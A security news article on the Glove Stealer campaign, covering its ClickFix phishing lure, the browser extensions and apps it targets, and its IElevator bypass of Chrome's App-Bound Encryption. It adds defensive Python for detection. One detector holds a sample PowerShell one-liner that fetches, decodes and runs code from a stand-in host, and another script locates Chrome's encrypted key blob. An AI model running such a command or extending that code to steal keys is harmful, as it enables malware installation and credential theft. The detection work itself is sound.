Glove Stealer Bypasses App-Bound Encryption
Written by Karolis Liucveikis on
In a recent article by security firm Gen Digital, researchers detailed a new campaign delivering Glove Stealer as its primary malware payload.
The stealer, named Glove by Gen Digital, uses ClickFix social-engineering tactics to get the victim to run the commands that install the malware. It is another recent instance of threat actors favoring info-stealing malware while relying on ClickFix or FakeCaptcha lures for distribution.
Briefly, Glove is a relatively simple info stealer with minimal obfuscation or protection mechanisms, suggesting it is still under development. What piqued the interest of security researchers, however, is how it bypasses App-Bound Encryption in Chrome by using the IElevator service.
In summary, the malware will attempt to exfiltrate sensitive information from a list of 280 browser extensions and more than 80 locally installed applications. These extensions and applications typically involve cryptocurrency wallets, 2FA authenticators, password managers, and email clients.
In the campaign discovered by Gen Digital, distribution of the new stealer begins with a spam phishing email that carries an HTML attachment. The HTML page implements the ClickFix tactic: it shows a crafted fake error message stating that some content could not be accessed properly, then advises the user how to "fix" it.
A user who follows the instructions, believing them to be harmless, copies a malicious script to the clipboard and unintentionally infects their own machine by pasting and executing it in a terminal or the Run prompt.
In one of the campaigns seen by the researchers, the ClickFix lure keeps up its charade by masquerading as the solution to a DNS issue. The command pasted into PowerShell downloads a Base64-encoded payload, decodes it, and executes it.
At the same time, the terminal displays messages that appear to diagnose the supposed problem and then state that a solution is being searched for, while the payload is in fact being downloaded.
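As an added example (not code from the article or from Gen Digital's analysis), the following Python triages PowerShell command lines, as collected from process-creation telemetry, for the fetch, Base64-decode and execute chain that the ClickFix lure relies on. The sample command lines, the URL and the indicator patterns are constructed for illustration and are assumptions to tune to your environment; it also decodes an `-EncodedCommand` argument so that the hidden content is scored too.

```python
import base64
import re

# Constructed process-creation command lines (not real Glove Stealer commands).
SAMPLE_COMMANDS = [
    # ClickFix-style one-liner: fetch Base64 text, decode it, execute it.
    'powershell.exe -w hidden -c "$p=(New-Object Net.WebClient)'
    '.DownloadString(\'http://example.invalid/dns-fix.txt\');'
    'iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($p)))"',
    # Encoded command, also common in these lures (decodes to "IEX (New-Object").
    'powershell.exe -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    # Benign administrative use.
    'powershell.exe -File C:\\Scripts\\Backup-Logs.ps1 -Verbose',
]

# Indicator name -> pattern. Matching is case-insensitive, as PowerShell is.
INDICATORS = {
    "download": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|Net\.WebClient", re.I),
    "base64": re.compile(r"FromBase64String|-e(?:nc(?:odedcommand)?)?\b", re.I),
    "execute": re.compile(r"Invoke-Expression|\biex\b|Start-Process", re.I),
    "evasion": re.compile(
        r"-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-ExecutionPolicy\s+bypass", re.I),
}

ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument (UTF-16LE in Base64), or ''."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_command(cmdline):
    """Score one command line; the decoded -enc payload is inspected as well."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # The lure's defining behaviour is "obtain content, decode it, run it":
    # a download or Base64 step combined with an execution primitive.
    chain = "execute" in hits and ("download" in hits or "base64" in hits)
    return {"indicators": hits, "decoded": decoded, "verdict": "suspicious" if chain else "benign"}


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        r = triage_command(cmd)
        print(f"{r['verdict']:10s} {r['indicators']}  {cmd[:60]}")
```

Commands typed into the Run prompt are also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so that key is worth collecting from a suspect host even when no process-creation telemetry exists; the same scoring can be applied to its values.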
Once the malware is installed, it checks whether it initialized correctly. If so, it runs every 55 seconds, matching running processes against well-known browser names; when it finds one, it terminates the browser's processes before it exfiltrates data, since a running browser keeps its credential and cookie databases locked.
To determine what valuable information could be stolen and where, the malware carries vast predefined lists of locally installed applications and browser extensions: as mentioned above, 84 locations for locally installed apps and 280 browser extensions.
Rather than providing the exact lists, the researchers noted that they focus on:
- A wide variety of cryptocurrency wallet browser extensions
- 2FA authenticators, including Google Authenticator, Microsoft Authenticator, Aegis, and LastPass Authenticator, to name a few
- Password managers, including Bitwarden, LastPass, and KeePass, to name a few
- Email clients like Thunderbird
- Gaming platforms like Steam and Battle.net
App-Bound Encryption Process
Chrome, as of version 127, ships App-Bound Encryption as a standard security feature on Windows. It binds the key that encrypts cookies and other stored data to the browser's identity: the key is wrapped so that only Chrome's elevation service, which verifies that the calling process is Chrome, will unwrap it.
If a malicious actor exfiltrated this data, it would be encrypted and practically useless unless the threat actor also obtained the encryption key. In October 2024, however, Alexander Hagenah publicly disclosed a method for bypassing this protection through the IElevator service.
When Glove Stealer attempts to steal data from Chrome, it requests a .NET payload from an attacker-controlled server. This payload is a small supporting module dedicated to bypassing App-Bound Encryption by using the IElevator service.
The malware authors named the payload "zagent.exe". Once executed, the module searches for the hardcoded string "app_bound_encrypted_key":" to locate and retrieve the App-Bound encryption key stored in the Local State file: %LOCALAPPDATA%\Google\Chrome\User Data\Local State.
Once retrieved, the key is Base64-decoded, decrypted through the IElevator service, and stored in a dedicated file called "chromekey.txt", which Glove Stealer itself then reads. After that, the command-and-control server is pinged to indicate that the bypass was successful.
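As an added example that is not part of the article or of the malware's code, the Python below reproduces the benign half of what the page describes: locating the app-bound key blob in Chrome's Local State file, both by parsing the JSON and by the literal marker string the module searches for, and checking the "APPB" prefix Chrome writes on it. The Local State content is constructed with placeholder blobs; the DPAPI-wrapped key is deliberately not decrypted, because that step is exactly what requires the IElevator service.

```python
import base64
import json

APP_BOUND_MAGIC = b"APPB"   # prefix Chrome writes on the app-bound key blob
LEGACY_MAGIC = b"DPAPI"     # prefix on the older, user-DPAPI-only key
MARKER = b'"app_bound_encrypted_key":"'  # the literal the page says zagent.exe searches for

# Constructed Local State excerpt. Chrome writes the file without whitespace,
# which is why a literal marker search works; the blobs are placeholders,
# not real DPAPI data.
SAMPLE_LOCAL_STATE = json.dumps({
    "os_crypt": {
        "encrypted_key": base64.b64encode(LEGACY_MAGIC + b"\x01\x00" + b"\xaa" * 16).decode(),
        "app_bound_encrypted_key": base64.b64encode(APP_BOUND_MAGIC + b"\x01\x00" + b"\xbb" * 16).decode(),
    },
    "profile": {"last_used": "Default"},
}, separators=(",", ":"))


def extract_by_marker(text):
    """Grab the Base64 value following the hardcoded marker, the way a naive tool would.
    Returns None when the marker is absent (e.g. a profile written before Chrome 127)."""
    data = text.encode()
    i = data.find(MARKER)
    if i < 0:
        return None
    start = i + len(MARKER)
    return data[start:data.index(b'"', start)].decode()


def extract_keys(text):
    """Parse os_crypt properly, strip and verify the magic prefixes.
    The returned blobs are still DPAPI-wrapped: the app-bound one can only be
    unwrapped through Chrome's elevation service (IElevator)."""
    os_crypt = json.loads(text).get("os_crypt", {})
    out = {"legacy": None, "app_bound": None}
    for field, magic, name in (("encrypted_key", LEGACY_MAGIC, "legacy"),
                               ("app_bound_encrypted_key", APP_BOUND_MAGIC, "app_bound")):
        value = os_crypt.get(field)
        if value is None:
            continue
        raw = base64.b64decode(value)
        if not raw.startswith(magic):
            raise ValueError(f"{field}: expected prefix {magic!r}, got {raw[:5]!r}")
        out[name] = raw[len(magic):]
    out["app_bound_enabled"] = out["app_bound"] is not None
    return out


if __name__ == "__main__":
    keys = extract_keys(SAMPLE_LOCAL_STATE)
    print("app-bound encryption in use:", keys["app_bound_enabled"])
    print("marker search finds:", extract_by_marker(SAMPLE_LOCAL_STATE))
```

The blob that remains after the APPB prefix is stripped is still a DPAPI-wrapped key; a Base64 decode on its own yields nothing usable, and unwrapping it is the step that needs either SYSTEM-level access or a call into the IElevator service, which is why the supporting module needs administrator rights and has to run from Chrome's own directory.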
Because App-Bound Encryption also validates the path of the calling process, this supporting module must be placed inside Chrome's Program Files directory tree. Writing there requires local administrator privileges, so Glove Stealer must first obtain them before it can use the supporting module.
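The path check gives defenders a check of their own: nothing other than Chrome's signed binaries should ever execute from its Program Files tree. As an added example (not from the article or Gen Digital), the Python below runs that rule over constructed EDR-style process-creation records. The field names, the allowlist of Chrome executables, the version folder and the records themselves are assumptions for illustration; match them to your telemetry and Chrome build.

```python
# Constructed process-creation records (one per line, pipe-separated
# key=value pairs). Paths, users and timestamps are made up.
SAMPLE_EVENTS = """\
UtcTime=2024-11-14 10:02:11|Image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|User=WS01\\alice|Signed=true|Signature=Google LLC
UtcTime=2024-11-14 10:02:12|Image=C:\\Program Files\\Google\\Chrome\\Application\\130.0.0.0\\elevation_service.exe|User=NT AUTHORITY\\SYSTEM|Signed=true|Signature=Google LLC
UtcTime=2024-11-14 10:03:40|Image=C:\\Program Files\\Google\\Chrome\\Application\\zagent.exe|User=WS01\\alice|Signed=false|Signature=
UtcTime=2024-11-14 10:03:41|Image=C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe|User=WS01\\alice|Signed=false|Signature=
"""

# Install roots that the elevation service's path validation covers (assumed).
CHROME_ROOTS = (
    "c:\\program files\\google\\chrome\\application\\",
    "c:\\program files (x86)\\google\\chrome\\application\\",
)
# Illustrative allowlist of executables that legitimately live in that tree.
CHROME_EXES = {"chrome.exe", "chrome_proxy.exe", "elevation_service.exe",
               "notification_helper.exe", "chrome_pwa_launcher.exe", "setup.exe"}
CHROME_SIGNER = "google llc"


def parse_events(text):
    """Turn the pipe-separated records into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        events.append(dict(field.split("=", 1) for field in line.split("|")))
    return events


def foreign_chrome_binaries(events):
    """Return (image, reasons) for every process started from Chrome's install tree
    that is not a known Chrome executable signed by Google."""
    findings = []
    for ev in events:
        image = ev.get("Image", "").replace("/", "\\")
        low = image.lower()                      # NTFS paths are case-insensitive
        if not low.startswith(CHROME_ROOTS):
            continue
        reasons = []
        if low.rsplit("\\", 1)[-1] not in CHROME_EXES:
            reasons.append("unexpected executable name")
        if ev.get("Signed", "").lower() != "true" or ev.get("Signature", "").lower() != CHROME_SIGNER:
            reasons.append("not signed by Google")
        if reasons:
            findings.append((image, reasons))
    return findings


if __name__ == "__main__":
    for image, reasons in foreign_chrome_binaries(parse_events(SAMPLE_EVENTS)):
        print(image, "->", ", ".join(reasons))
```

The Temp\setup.exe record is deliberately not flagged: this rule watches the boundary the path validation draws, and the drop location before the module is moved into place is a job for other detections. The signature check matters as much as the name check, since an attacker who already has administrator rights can name the dropped module anything.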
With all this considered, researchers concluded the following,
In this analysis, we described Glove Stealer, an information stealer observed in recent phishing campaigns that leverage social engineering tactics, such as ClickFix. In these tactics, the attackers aim to trick users into thinking they are helping themselves, when in reality, they are inadvertently infecting their devices by following the instructions provided by the attackers…Glove Stealer is capable of stealing various kinds of information from many browsers, including Chrome, Firefox, Edge, Brave and others. To achieve this, Glove Stealer uses a dedicated supporting module that leverages IElevator service to bypass App-Bound encryption. Additionally, it steals sensitive data from two extensive lists: one representing locally installed applications and the other representing browser extensions. These include cryptocurrency wallet extensions, 2FA authenticators, password managers, email clients and more.